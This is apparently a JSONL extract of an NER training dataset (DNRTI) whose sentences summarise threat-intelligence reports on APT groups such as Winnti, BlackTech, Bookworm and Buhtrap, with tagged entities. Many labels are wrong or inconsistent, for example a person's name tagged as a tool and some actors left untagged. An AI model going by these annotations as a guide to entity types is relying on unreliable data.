{"text": "According to a 49-page report published Thursday , all of the attacks are the work of Chinese government 's intelligence apparatus , which the report 's authors dub the Winnti Umbrella .", "spans": {"THREAT_ACTOR: Winnti Umbrella": [[169, 184]]}, "info": {"id": "dnrti_train_001725", "source": "dnrti_train"}}
{"text": "Researchers from various security organizations have used a variety of names to assign responsibility for the hacks , including LEAD , BARIUM , Wicked Panda , GREF , PassCV , Axiom , and Winnti .", "spans": {"THREAT_ACTOR: LEAD": [[128, 132]], "THREAT_ACTOR: BARIUM": [[135, 141]], "THREAT_ACTOR: Wicked Panda": [[144, 156]], "THREAT_ACTOR: GREF": [[159, 163]], "THREAT_ACTOR: PassCV": [[166, 172]], "THREAT_ACTOR: Axiom": [[175, 180]], "THREAT_ACTOR: Winnti": [[187, 193]]}, "info": {"id": "dnrti_train_001726", "source": "dnrti_train"}}
{"text": "It targets organizations in Japan , South Korea , and Taiwan , leveling its attacks on public sector agencies and telecommunications and other high-technology industries .", "spans": {"ORGANIZATION: public sector agencies": [[87, 109]]}, "info": {"id": "dnrti_train_001727", "source": "dnrti_train"}}
{"text": "In 2016 , for instance , we found their campaigns attacking Japanese organizations with various malware tools , notably the Elirks backdoor .", "spans": {"TOOL: Elirks backdoor": [[124, 139]]}, "info": {"id": "dnrti_train_001728", "source": "dnrti_train"}}
{"text": "Blackgear has been targeting various industries since its emergence a decade ago .", "spans": {}, "info": {"id": "dnrti_train_001729", "source": "dnrti_train"}}
{"text": "Blackgear 's campaigns also use email as an entry point , which is why it's important to secure the email gateway .", "spans": {}, "info": {"id": "dnrti_train_001730", "source": "dnrti_train"}}
{"text": "BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years .", "spans": {"ORGANIZATION: users": [[54, 59]]}, "info": {"id": "dnrti_train_001731", "source": "dnrti_train"}}
{"text": "Our research indicates that it has started targeting Japanese users .", "spans": {"ORGANIZATION: Japanese users": [[53, 67]]}, "info": {"id": "dnrti_train_001732", "source": "dnrti_train"}}
{"text": "The malware tools used by BLACKGEAR can be categorized into three categories : binders , downloaders and backdoors .", "spans": {"TOOL: binders": [[79, 86]], "TOOL: downloaders": [[89, 100]], "TOOL: backdoors": [[105, 114]]}, "info": {"id": "dnrti_train_001733", "source": "dnrti_train"}}
{"text": "Binders are delivered by attack vectors ( such as phishing and watering hole attacks ) onto a machine .", "spans": {"TOOL: Binders": [[0, 7]]}, "info": {"id": "dnrti_train_001734", "source": "dnrti_train"}}
{"text": "Based on the mutexes and domain names of some of their C&C servers , BlackTech 's campaigns are likely designed to steal their target 's technology .", "spans": {}, "info": {"id": "dnrti_train_001735", "source": "dnrti_train"}}
{"text": "Following their activities and evolving tactics and techniques helped us uncover the proverbial red string of fate that connected three seemingly disparate campaigns : PLEAD , Shrouded Crossbow , and of late , Waterbear .", "spans": {}, "info": {"id": "dnrti_train_001736", "source": "dnrti_train"}}
{"text": "Active since 2012 , it has so far targeted Taiwanese government agencies and private organizations .", "spans": {"ORGANIZATION: government agencies": [[53, 72]]}, "info": {"id": "dnrti_train_001737", "source": "dnrti_train"}}
{"text": "PLEAD uses spear-phishing emails to deliver and install their backdoor , either as an attachment or through links to cloud storage services .", "spans": {"TOOL: cloud storage services": [[117, 139]]}, "info": {"id": "dnrti_train_001738", "source": "dnrti_train"}}
{"text": "PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach .", "spans": {"VULNERABILITY: Flash vulnerability": [[108, 127]], "VULNERABILITY: CVE-2015-5119": [[130, 143]]}, "info": {"id": "dnrti_train_001739", "source": "dnrti_train"}}
{"text": "PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server .", "spans": {"VULNERABILITY: CVE-2017-7269": [[16, 29]]}, "info": {"id": "dnrti_train_001740", "source": "dnrti_train"}}
{"text": "This campaign , first observed in 2010 , is believed to be operated by a well-funded group given how it appeared to have purchased the source code of the BIFROST backdoor , which the operators enhanced and created other tools from .", "spans": {}, "info": {"id": "dnrti_train_001741", "source": "dnrti_train"}}
{"text": "Shrouded Crossbow targeted privatized agencies and government contractors as well as enterprises in the consumer electronics , computer , healthcare , and financial industries .", "spans": {"ORGANIZATION: privatized agencies": [[27, 46]], "ORGANIZATION: government contractors": [[51, 73]]}, "info": {"id": "dnrti_train_001742", "source": "dnrti_train"}}
{"text": "Shrouded Crossbow employs three BIFROST-derived backdoors : BIFROSE , KIVARS , and XBOW .", "spans": {"TOOL: BIFROST-derived backdoors": [[32, 57]], "TOOL: BIFROSE": [[60, 67]], "TOOL: KIVARS": [[70, 76]], "TOOL: XBOW": [[83, 87]]}, "info": {"id": "dnrti_train_001743", "source": "dnrti_train"}}
{"text": "Like PLEAD , Shrouded Crossbow uses spear-phishing emails with backdoor-laden attachments that utilize the RTLO technique and accompanied by decoy documents .", "spans": {"TOOL: RTLO technique": [[107, 121]], "MALWARE: decoy documents": [[141, 156]]}, "info": {"id": "dnrti_train_001744", "source": "dnrti_train"}}
{"text": "XBOW 's capabilities are derived from BIFROSE and KIVARS ; Shrouded Crossbow gets its name from its unique mutex format .", "spans": {"TOOL: XBOW": [[0, 4]], "TOOL: BIFROSE": [[38, 45]], "TOOL: KIVARS": [[50, 56]]}, "info": {"id": "dnrti_train_001745", "source": "dnrti_train"}}
{"text": "While PLEAD and KIVARS are most likely to be used in first phase attacks , Waterbear can be seen as a secondary backdoor installed after attackers have gained a certain level of privilege .", "spans": {"TOOL: PLEAD": [[6, 11]], "TOOL: KIVARS": [[16, 22]]}, "info": {"id": "dnrti_train_001746", "source": "dnrti_train"}}
{"text": "Recently , the JPCERT published a thorough analysis of the Plead backdoor , which , according to Trend Micro , is used by the cyberespionage group BlackTech .", "spans": {"ORGANIZATION: JPCERT": [[15, 21]], "TOOL: Plead backdoor": [[59, 73]], "ORGANIZATION: Trend Micro": [[97, 108]]}, "info": {"id": "dnrti_train_001747", "source": "dnrti_train"}}
{"text": "Despite the fact that the Changing Information Technology Inc. certificate was revoked on July 4 , 2017 , the BlackTech group is still using it to sign their malicious tools .", "spans": {}, "info": {"id": "dnrti_train_001748", "source": "dnrti_train"}}
{"text": "The BlackTech group is primarily focused on cyberespionage in Asia .", "spans": {}, "info": {"id": "dnrti_train_001749", "source": "dnrti_train"}}
{"text": "The new activity described in this blogpost was detected by ESET in Taiwan , where the Plead malware has always been most actively deployed .", "spans": {"ORGANIZATION: ESET": [[60, 64]], "TOOL: Plead malware": [[87, 100]]}, "info": {"id": "dnrti_train_001750", "source": "dnrti_train"}}
{"text": "Attackers are targeting Windows platform and aiming at government institutions as well as big companies in Colombia .", "spans": {"ORGANIZATION: government institutions": [[55, 78]]}, "info": {"id": "dnrti_train_001751", "source": "dnrti_train"}}
{"text": "Attackers like to use spear-fishing email with password protected RAR attachment to avoid being detected by the email gateway .", "spans": {"TOOL: RAR": [[66, 69]]}, "info": {"id": "dnrti_train_001752", "source": "dnrti_train"}}
{"text": "The first sample being captured was in April 2018 and since that we observed a lot more related ones .", "spans": {}, "info": {"id": "dnrti_train_001753", "source": "dnrti_train"}}
{"text": "After performing investigations on the classified victims , we find the attacker targets big companies and government agencies in Colombia .", "spans": {"ORGANIZATION: government agencies": [[107, 126]]}, "info": {"id": "dnrti_train_001754", "source": "dnrti_train"}}
{"text": "After monitoring and correlating the APT attack , 360 Threat Intelligence Center discovered multiple related emails to attack Colombian government agencies , financial institutions and large enterprises .", "spans": {"ORGANIZATION: 360 Threat Intelligence Center": [[50, 80]], "ORGANIZATION: government agencies": [[136, 155]], "ORGANIZATION: financial institutions": [[158, 180]]}, "info": {"id": "dnrti_train_001755", "source": "dnrti_train"}}
{"text": "The oldest sample we've seen up to now is from November 2013 .", "spans": {}, "info": {"id": "dnrti_train_001756", "source": "dnrti_train"}}
{"text": "One of the top targets is the Japan Pension Service , but the list of targeted industries includes government and government agencies , local governments , public interest groups , universities , banks , financial services , energy and so on .", "spans": {"ORGANIZATION: Pension Service": [[36, 51]]}, "info": {"id": "dnrti_train_001757", "source": "dnrti_train"}}
{"text": "However , the attack is different in two respects : unlike other APTs , the main focus of Blue Termite is to attack Japanese organizations ; and most of their C2s are located in Japan .", "spans": {"TOOL: Blue Termite": [[90, 102]]}, "info": {"id": "dnrti_train_001758", "source": "dnrti_train"}}
{"text": "Originally , the main infection vector of Blue Termite was spear-phishing emails .", "spans": {"TOOL: Blue Termite": [[42, 54]]}, "info": {"id": "dnrti_train_001759", "source": "dnrti_train"}}
{"text": "Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "VULNERABILITY: flash exploit": [[96, 109]], "VULNERABILITY: CVE-2015-5119": [[112, 125]]}, "info": {"id": "dnrti_train_001760", "source": "dnrti_train"}}
{"text": "Kaspersky Lab also found some watering hole attacks , including one on a website belonging to a prominent member of the Japanese government .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]]}, "info": {"id": "dnrti_train_001761", "source": "dnrti_train"}}
{"text": "In early July 2015 , however , Kaspersky Lab found a sample that creates a decryption key with Salt1 , Salt2 , and Salt3 .", "spans": {"ORGANIZATION: Kaspersky Lab": [[31, 44]]}, "info": {"id": "dnrti_train_001762", "source": "dnrti_train"}}
{"text": "From early June , when the cyber-attack on the Japan Pension Service started to be reported widely , various Japanese organizations would have started to deploy protection measures .", "spans": {"ORGANIZATION: Pension Service": [[53, 68]]}, "info": {"id": "dnrti_train_001763", "source": "dnrti_train"}}
{"text": "It employs AES in addition to SID tricks , making it difficult to decrypt sensitive data .", "spans": {"TOOL: AES": [[11, 14]], "TOOL: SID": [[30, 33]]}, "info": {"id": "dnrti_train_001764", "source": "dnrti_train"}}
{"text": "In order to fight back against this cyber-espionage , Kaspersky Lab will continue its research .", "spans": {"ORGANIZATION: Kaspersky Lab": [[54, 67]]}, "info": {"id": "dnrti_train_001765", "source": "dnrti_train"}}
{"text": "Bookworm 's functional code is radically different from PlugX and has a rather unique modular architecture that warranted additional analysis by Unit 42 .", "spans": {"TOOL: Bookworm": [[0, 8]], "TOOL: PlugX": [[56, 61]], "ORGANIZATION: Unit 42": [[145, 152]]}, "info": {"id": "dnrti_train_001766", "source": "dnrti_train"}}
{"text": "Bookworm has little malicious functionality built-in , with its only core ability involving stealing keystrokes and clipboard contents .", "spans": {"TOOL: Bookworm": [[0, 8]]}, "info": {"id": "dnrti_train_001767", "source": "dnrti_train"}}
{"text": "The Plead malware is a backdoor which , according to Trend Micro , is used by the BlackTech group in targeted attacks .", "spans": {"TOOL: Plead malware": [[4, 17]], "TOOL: backdoor": [[23, 31]], "ORGANIZATION: Trend Micro": [[53, 64]]}, "info": {"id": "dnrti_train_001768", "source": "dnrti_train"}}
{"text": "So far , it appears threat actors have deployed the Bookworm Trojan primarily in attacks on targets in Thailand .", "spans": {"TOOL: Bookworm Trojan": [[52, 67]]}, "info": {"id": "dnrti_train_001769", "source": "dnrti_train"}}
{"text": "The threat actors use a commercial installation tool called Smart Installer Maker to encapsulate and execute a self-extracting RAR archive and in some cases a decoy slideshow or Flash installation application .", "spans": {"TOOL: Smart Installer Maker": [[60, 81]], "TOOL: self-extracting RAR": [[111, 130]], "TOOL: decoy slideshow": [[159, 174]], "TOOL: Flash installation application": [[178, 208]]}, "info": {"id": "dnrti_train_001770", "source": "dnrti_train"}}
{"text": "The self-extracting RAR writes a legitimate executable , an actor-created DLL called Loader.dll and a file named readme.txt to the filesystem and then executes the legitimate executable .", "spans": {"TOOL: self-extracting RAR": [[4, 23]], "MALWARE: Loader.dll": [[85, 95]], "MALWARE: readme.txt": [[113, 123]]}, "info": {"id": "dnrti_train_001771", "source": "dnrti_train"}}
{"text": "Using XREFs during static analysis is a common technique to quickly find where functions of interest are called .", "spans": {"TOOL: XREFs": [[6, 11]]}, "info": {"id": "dnrti_train_001773", "source": "dnrti_train"}}
{"text": "The developers designed Bookworm to be a modular Trojan not limited to just the initial architecture of the Trojan , as Bookworm can also load additional modules provided by the C2 server .", "spans": {"TOOL: Bookworm": [[24, 32], [120, 128]], "TOOL: modular Trojan": [[41, 55]]}, "info": {"id": "dnrti_train_001774", "source": "dnrti_train"}}
{"text": "Although the developers of Bookworm have included only keylogging functionality in Bookworm as a core ability , as suggested in Table 1 , several of the embedded DLLs provide Leader with cryptographic and hashing functions , while others support Leader 's ability to communicate with its C2 server .", "spans": {"TOOL: Bookworm": [[27, 35], [83, 91]], "TOOL: Leader": [[246, 252]]}, "info": {"id": "dnrti_train_001775", "source": "dnrti_train"}}
{"text": "While we did not discuss the surrounding attacks using Bookworm in detail , we have observed threat actors deploying Bookworm primarily in attacks on targets in Thailand .", "spans": {"TOOL: Bookworm": [[55, 63], [117, 125]]}, "info": {"id": "dnrti_train_001776", "source": "dnrti_train"}}
{"text": "Also , Bookworm uses a combination of encryption and compression algorithms to obfuscate the traffic between the system and C2 server .", "spans": {"TOOL: Bookworm": [[7, 15]]}, "info": {"id": "dnrti_train_001777", "source": "dnrti_train"}}
{"text": "The developers of Bookworm have gone to great lengths to create a modular framework that is very flexible through its ability to run additional modules directly from its C2 server .", "spans": {"TOOL: Bookworm": [[18, 26]]}, "info": {"id": "dnrti_train_001778", "source": "dnrti_train"}}
{"text": "Unit 42 recently published a blog on a newly identified Trojan called Bookworm , which discussed the architecture and capabilities of the malware and alluded to Thailand being the focus of the threat actors' campaigns .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "TOOL: Bookworm": [[70, 78]]}, "info": {"id": "dnrti_train_001779", "source": "dnrti_train"}}
{"text": "Leader is Bookworm 's main module and controls all of the activities of the Trojan , but relies on the additional DLLs to provide specific functionality .", "spans": {"TOOL: Leader": [[0, 6]], "TOOL: Bookworm": [[10, 18]], "MALWARE: DLLs": [[114, 118]]}, "info": {"id": "dnrti_train_001780", "source": "dnrti_train"}}
{"text": "The developers of Bookworm use these modules in a rather unique way , as the other embedded DLLs provide API functions for Leader to carry out its tasks .", "spans": {"TOOL: Bookworm": [[18, 26]], "TOOL: Leader": [[123, 129]]}, "info": {"id": "dnrti_train_001781", "source": "dnrti_train"}}
{"text": "Unit 42 does not have detailed targeting information for all known Bookworm samples , but we are aware of attempted attacks on at least two branches of government in Thailand .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "TOOL: Bookworm samples": [[67, 83]]}, "info": {"id": "dnrti_train_001782", "source": "dnrti_train"}}
{"text": "We speculate that other attacks delivering Bookworm were also targeting organizations in Thailand based on the contents of the associated decoys documents , as well as several of the dynamic DNS domain names used to host C2 servers that contain the words \" Thai \" or \" Thailand \" .", "spans": {"TOOL: Bookworm": [[43, 51]], "MALWARE: decoys documents": [[138, 154]], "TOOL: dynamic DNS domain": [[183, 201]]}, "info": {"id": "dnrti_train_001783", "source": "dnrti_train"}}
{"text": "We believe that it is likely threat actors will continue development Bookworm , and will continue to use it for the foreseeable future .", "spans": {"TOOL: Bookworm": [[69, 77]]}, "info": {"id": "dnrti_train_001784", "source": "dnrti_train"}}
{"text": "Threat actors have delivered Bookworm as a payload in attacks on targets in Thailand .", "spans": {"TOOL: Bookworm": [[29, 37]]}, "info": {"id": "dnrti_train_001785", "source": "dnrti_train"}}
{"text": "Analysis of compromised systems seen communicating with Bookworm C2 servers also confirms our speculation on targeting with a majority of systems existing within Thailand .", "spans": {"TOOL: Bookworm C2 servers": [[56, 75]]}, "info": {"id": "dnrti_train_001786", "source": "dnrti_train"}}
{"text": "As mentioned in our previous blog on Bookworm , the Trojan sends a static date string to the C2 server that we referred to as a campaign code .", "spans": {"TOOL: Bookworm": [[37, 45]], "TOOL: Trojan": [[52, 58]]}, "info": {"id": "dnrti_train_001787", "source": "dnrti_train"}}
{"text": "We believed that the actors would use this date code to track their attack campaigns ; however , after continued analysis of the malware , we think these static dates could also be a build identifier for the Trojan .", "spans": {"TOOL: date code": [[43, 52]]}, "info": {"id": "dnrti_train_001788", "source": "dnrti_train"}}
{"text": "Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier .", "spans": {"MALWARE: date string hardcoded": [[26, 47]], "TOOL: Bookworm sample": [[58, 73]]}, "info": {"id": "dnrti_train_001789", "source": "dnrti_train"}}
{"text": "A Trojan sending a build identifier to its C2 server is quite common , as it notifies the threat actors of the specific version of the Trojan in which they are interacting .", "spans": {}, "info": {"id": "dnrti_train_001790", "source": "dnrti_train"}}
{"text": "We believe that Bookworm samples use the static date string as campaign codes , which we used to determine the approximate date of each attack that we did not have detailed targeting information .", "spans": {"TOOL: Bookworm samples": [[16, 32]]}, "info": {"id": "dnrti_train_001792", "source": "dnrti_train"}}
{"text": "Another decoy slideshow associated with the Bookworm attack campaign contains photos of an event called Bike for Dad 2015 .", "spans": {"MALWARE: decoy slideshow": [[8, 23]]}, "info": {"id": "dnrti_train_001793", "source": "dnrti_train"}}
{"text": "The campaign code \" 20150920 \" is associated with this decoy , which is a week prior to media articles announcing that the Crown Price of Thailand Maha Vajiralongkorn will lead the Bike for Dad 2015 event .", "spans": {}, "info": {"id": "dnrti_train_001794", "source": "dnrti_train"}}
{"text": "Chitpas is heavily involved with Thailand politics and was a core leader of the People's Committee for Absolute Democracy ( PCAD ) , which is an organization that staged anti-government campaigns in 2013 and 2014 .", "spans": {}, "info": {"id": "dnrti_train_001795", "source": "dnrti_train"}}
{"text": "The final remaining known decoy includes photos of Chitpas Tant Kridakon ( Figure 7 ) , who is known as heiress to the largest brewery in Thailand .", "spans": {"TOOL: decoy": [[26, 31]], "TOOL: Chitpas Tant Kridakon": [[51, 72]]}, "info": {"id": "dnrti_train_001796", "source": "dnrti_train"}}
{"text": "These images were associated with the Bookworm campaign code \" 20150905 \" .", "spans": {}, "info": {"id": "dnrti_train_001797", "source": "dnrti_train"}}
{"text": "Unit 42 analyzed the systems communicating with the Bookworm C2 domains and found that a majority of the IP addresses existed within autonomous systems ( ASN ) located in Thailand .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "TOOL: Bookworm": [[52, 60]]}, "info": {"id": "dnrti_train_001798", "source": "dnrti_train"}}
{"text": "The pie chart in Figure 8 shows that the vast majority ( 73% ) of the hosts are geographically located in Thailand , which matches the known targeting of this threat group .", "spans": {}, "info": {"id": "dnrti_train_001799", "source": "dnrti_train"}}
{"text": "We believe that the IP addresses from Canada , Russia and Norway are analysis systems of antivirus companies or security researchers .", "spans": {"ORGANIZATION: antivirus companies": [[89, 108]]}, "info": {"id": "dnrti_train_001800", "source": "dnrti_train"}}
{"text": "Overall , the Bookworm infrastructure overlaps with the infrastructure hosting C2 servers used by various attack tools , including FFRAT , Poison Ivy , PlugX , and others .", "spans": {"TOOL: Bookworm": [[14, 22]], "TOOL: FFRAT": [[131, 136]], "TOOL: Poison Ivy": [[139, 149]], "TOOL: PlugX": [[152, 157]]}, "info": {"id": "dnrti_train_001801", "source": "dnrti_train"}}
{"text": "Unit 42 enumerated the threat infrastructure related to Bookworm and created a chart to visualize connected entities to its current attack campaign .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "TOOL: Bookworm": [[56, 64]]}, "info": {"id": "dnrti_train_001803", "source": "dnrti_train"}}
{"text": "Threat actors have targeted the government of Thailand and delivered the newly discovered Bookworm Trojan since July 2015 .", "spans": {"TOOL: Bookworm Trojan": [[90, 105]]}, "info": {"id": "dnrti_train_001804", "source": "dnrti_train"}}
{"text": "The actors appear to follow a set playbook , as the observed TTPs are fairly static within each attack in this campaign .", "spans": {}, "info": {"id": "dnrti_train_001805", "source": "dnrti_train"}}
{"text": "So far , Unit 42 has seen infrastructure overlaps with servers hosting C2 servers for samples of the FFRAT , PlugX , Poison Ivy and Scieron Trojans , suggesting that the threat actors use these tools as the payload in their attacks .", "spans": {"ORGANIZATION: Unit 42": [[9, 16]], "TOOL: FFRAT": [[101, 106]], "TOOL: PlugX": [[109, 114]], "TOOL: Poison Ivy": [[117, 127]], "TOOL: Scieron Trojans": [[132, 147]]}, "info": {"id": "dnrti_train_001806", "source": "dnrti_train"}}
{"text": "The threat actors have continually used Flash Player installers and Flash slideshows for decoys .", "spans": {"TOOL: Flash Player installers": [[40, 63]], "TOOL: Flash slideshows": [[68, 84]]}, "info": {"id": "dnrti_train_001807", "source": "dnrti_train"}}
{"text": "The vast majority of systems communicating with Bookworm C2 servers are within the Bangkok metropolitan area where a majority of the government of Thailand exists .", "spans": {"TOOL: Bookworm": [[48, 56]]}, "info": {"id": "dnrti_train_001808", "source": "dnrti_train"}}
{"text": "Buhtrap has been active since 2014 , however their first attacks against financial institutions were only detected in August 2015 .", "spans": {"THREAT_ACTOR: Buhtrap": [[0, 7]], "ORGANIZATION: financial institutions": [[73, 95]]}, "info": {"id": "dnrti_train_001809", "source": "dnrti_train"}}
{"text": "At the moment , the group is known to target Russian and Ukrainian banks .", "spans": {}, "info": {"id": "dnrti_train_001810", "source": "dnrti_train"}}
{"text": "Buhtrap is the first hacker group using a network worm to infect the overall bank infrastructure that significantly increases the difficulty of removing all malicious functions from the network .", "spans": {"THREAT_ACTOR: Buhtrap": [[0, 7]]}, "info": {"id": "dnrti_train_001811", "source": "dnrti_train"}}
{"text": "Malicious programs intentionally scan for machines with an automated Bank-Customer system of the Central bank of Russia ( further referred to as BCS CBR ) .", "spans": {}, "info": {"id": "dnrti_train_001812", "source": "dnrti_train"}}
{"text": "We noticed that criminals were spreading Buhtrap using this method from May 2015 to August 2015 .", "spans": {"THREAT_ACTOR: Buhtrap": [[41, 48]]}, "info": {"id": "dnrti_train_001814", "source": "dnrti_train"}}
{"text": "It is worth noting that attackers used the same compromised websites to spread Buhtrap as those that had been used for the Corkow Trojan .", "spans": {"TOOL: compromised websites": [[48, 68]], "TOOL: Buhtrap": [[79, 86]], "TOOL: Corkow Trojan": [[123, 136]]}, "info": {"id": "dnrti_train_001815", "source": "dnrti_train"}}
{"text": "Moreover , they used the same exploit kit Niteris as that in the Corkow case .", "spans": {"VULNERABILITY: kit Niteris": [[38, 49]], "TOOL: Corkow": [[65, 71]]}, "info": {"id": "dnrti_train_001816", "source": "dnrti_train"}}
{"text": "Purportedly during one of the first attacks hackers intercepted the mailing list of the Anti-drop \" club and created a specific phishing email for its members .", "spans": {}, "info": {"id": "dnrti_train_001817", "source": "dnrti_train"}}
{"text": "However , it is still widely used , notably in Russia .", "spans": {}, "info": {"id": "dnrti_train_001818", "source": "dnrti_train"}}
{"text": "As noted in our previous blog on Buhtrap , this gang has been actively targeting Russian businesses , mostly through spear-phishing .", "spans": {}, "info": {"id": "dnrti_train_001819", "source": "dnrti_train"}}
{"text": "It is thus interesting to see Buhtrap add strategic web compromises to their arsenal .", "spans": {}, "info": {"id": "dnrti_train_001820", "source": "dnrti_train"}}
{"text": "The first malware we saw was the lurk downloader , which was distributed on October 26th .", "spans": {"TOOL: lurk downloader": [[33, 48]]}, "info": {"id": "dnrti_train_001821", "source": "dnrti_train"}}
{"text": "The executable would install the real Ammyy product , but would also launch a file called either AmmyyService.exe or AmmyySvc.exe which contained the malicious payload .", "spans": {"MALWARE: AmmyyService.exe": [[97, 113]], "MALWARE: AmmyySvc.exe": [[117, 129]]}, "info": {"id": "dnrti_train_001822", "source": "dnrti_train"}}
{"text": "Buhtrap is getting better at disguising the code they inject into compromised websites .", "spans": {"THREAT_ACTOR: Buhtrap": [[0, 7]], "TOOL: compromised websites": [[66, 86]]}, "info": {"id": "dnrti_train_001823", "source": "dnrti_train"}}
{"text": "With the recent arrests of actors using the Lurk banking trojan , Buhtrap appears to be a likely alternative for actors wishing to target Russian banks and software .", "spans": {"TOOL: Lurk banking trojan": [[44, 63]]}, "info": {"id": "dnrti_train_001824", "source": "dnrti_train"}}
{"text": "They have different functions and ways of spreading , but the same purpose — to steal money from the accounts of businesses .", "spans": {}, "info": {"id": "dnrti_train_001825", "source": "dnrti_train"}}
{"text": "Our experts have found that cybercriminals are actively focusing on SMBs , and giving particular attention to accountants .", "spans": {"TOOL: SMBs": [[68, 72]], "ORGANIZATION: accountants": [[110, 121]]}, "info": {"id": "dnrti_train_001826", "source": "dnrti_train"}}
{"text": "The first encounter with Buhtrap was registered back in 2014 .", "spans": {}, "info": {"id": "dnrti_train_001827", "source": "dnrti_train"}}
{"text": "For now , we can call RTM one of the most active financial Trojans .", "spans": {"TOOL: RTM": [[22, 25]]}, "info": {"id": "dnrti_train_001828", "source": "dnrti_train"}}
{"text": "At that time it was the name of a cybercriminal group that was stealing money from Russian financial establishments — to the tune of at least $150,000 per hit .", "spans": {"ORGANIZATION: financial establishments": [[91, 115]]}, "info": {"id": "dnrti_train_001829", "source": "dnrti_train"}}
{"text": "Buhtrap resurfaced in the beginning of 2017 in the TwoBee campaign , where it served primarily as means of malware delivery .", "spans": {}, "info": {"id": "dnrti_train_001830", "source": "dnrti_train"}}
{"text": "After the source codes of their tools became public in 2016 , the name Buhtrap was used for the financial Trojan .", "spans": {"TOOL: financial Trojan": [[96, 112]]}, "info": {"id": "dnrti_train_001831", "source": "dnrti_train"}}
{"text": "Just like last time , Buhtrap is spreading through exploits embedded in news outlets .", "spans": {}, "info": {"id": "dnrti_train_001832", "source": "dnrti_train"}}
{"text": "Estimating the damages is challenging , but as we learned , the criminals are siphoning off assets in transactions that do not exceed $15,000 each .", "spans": {}, "info": {"id": "dnrti_train_001833", "source": "dnrti_train"}}
{"text": "As explained later , we believe this campaign is financially-motivated and that it targets accounting departments in Russian businesses .", "spans": {"ORGANIZATION: accounting departments": [[91, 113]]}, "info": {"id": "dnrti_train_001834", "source": "dnrti_train"}}
{"text": "\" Buhgalter \" means \" accountant \" in Russian .", "spans": {}, "info": {"id": "dnrti_train_001835", "source": "dnrti_train"}}
{"text": "Seeing a campaign like this , inevitably the Anunak/Carbanak documented by Fox-IT and Kaspersky comes to mind .", "spans": {"TOOL: Anunak/Carbanak": [[45, 60]], "ORGANIZATION: Fox-IT": [[75, 81]], "ORGANIZATION: Kaspersky": [[86, 95]]}, "info": {"id": "dnrti_train_001836", "source": "dnrti_train"}}
{"text": "The infection vector is similar , it uses a similar modified mimikatz application , and it uses a third-party remote access tool , changes system settings to allow concurrent RDP sessions , and so on .", "spans": {"TOOL: mimikatz": [[61, 69]], "TOOL: third-party remote access tool": [[98, 128]], "TOOL: RDP": [[175, 178]]}, "info": {"id": "dnrti_train_001837", "source": "dnrti_train"}}
{"text": "The second , aptly titled \" kontrakt87.doc \" , copies a generic telecommunications service contract from MegaFon , a large Russian mobile phone operator .", "spans": {"MALWARE: kontrakt87.doc": [[28, 42]], "ORGANIZATION: MegaFon": [[105, 112]], "ORGANIZATION: mobile phone operator": [[131, 152]]}, "info": {"id": "dnrti_train_001838", "source": "dnrti_train"}}
{"text": "Careto 's Mask campaign we discovered relies on spear-phishing e-mails with links to a malicious website .", "spans": {"MALWARE: Careto": [[0, 6]]}, "info": {"id": "dnrti_train_001840", "source": "dnrti_train"}}
{"text": "Sometimes , the attackers use sub-domains on the exploit websites , to make them seem more legitimate .", "spans": {"TOOL: sub-domains": [[30, 41]]}, "info": {"id": "dnrti_train_001841", "source": "dnrti_train"}}
{"text": "These sub-domains simulate sub-sections of the main newspapers in Spain plus some international ones like the Guardian and the Washington Post .", "spans": {"ORGANIZATION: Washington Post": [[127, 142]]}, "info": {"id": "dnrti_train_001842", "source": "dnrti_train"}}
{"text": "The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story .", "spans": {"VULNERABILITY: CVE-2012-0773": [[4, 17]]}, "info": {"id": "dnrti_train_001843", "source": "dnrti_train"}}
{"text": "In other words , the attackers attracted our attention by attempting to exploit Kaspersky Lab products .", "spans": {"TOOL: Kaspersky Lab products": [[80, 102]]}, "info": {"id": "dnrti_train_001844", "source": "dnrti_train"}}
{"text": "We initially became aware of Careto when we observed attempts to exploit a vulnerability in our products to make the malware \" invisible \" in the system .", "spans": {"MALWARE: Careto": [[29, 35]]}, "info": {"id": "dnrti_train_001845", "source": "dnrti_train"}}
{"text": "Most modules were created in 2012 .", "spans": {}, "info": {"id": "dnrti_train_001846", "source": "dnrti_train"}}
{"text": "The attackers began taking them offline in January 2014 .", "spans": {}, "info": {"id": "dnrti_train_001847", "source": "dnrti_train"}}
{"text": "Last week we discussed Numbered Panda , a group that is also based out of China and is fairly well known to the security community , though by many names .", "spans": {"THREAT_ACTOR: Numbered Panda": [[23, 37]], "ORGANIZATION: security community": [[112, 130]]}, "info": {"id": "dnrti_train_001848", "source": "dnrti_train"}}
{"text": "We revealed a Chinese-based adversary we crypt as Anchor Panda , a group with very specific tactics , techniques , and procedures ( TTPs ) and a keen interest in maritime operations and naval and aerospace technology .", "spans": {"THREAT_ACTOR: Anchor Panda": [[50, 62]]}, "info": {"id": "dnrti_train_001849", "source": "dnrti_train"}}
{"text": "The campaign was active until January 2014 , but during our investigations the C&C servers were shut down .", "spans": {}, "info": {"id": "dnrti_train_001850", "source": "dnrti_train"}}
{"text": "This week we are going to discuss Clever Kitten , whom , by virtue of several indicators , we have affiliated with the Islamic Republic of Iran .", "spans": {}, "info": {"id": "dnrti_train_001851", "source": "dnrti_train"}}
{"text": "Clever Kitten has moved to leveraging strategic web compromises .", "spans": {"THREAT_ACTOR: Clever Kitten": [[0, 13]]}, "info": {"id": "dnrti_train_001852", "source": "dnrti_train"}}
{"text": "Clever Kitten actors have a strong affinity for PHP server-side attacks to make access ; this is relatively unique amongst targeted attackers who often favor targeting a specific individual at a specific organization using social engineering .", "spans": {"THREAT_ACTOR: Clever Kitten": [[0, 13]], "ORGANIZATION: individual": [[179, 189]]}, "info": {"id": "dnrti_train_001853", "source": "dnrti_train"}}
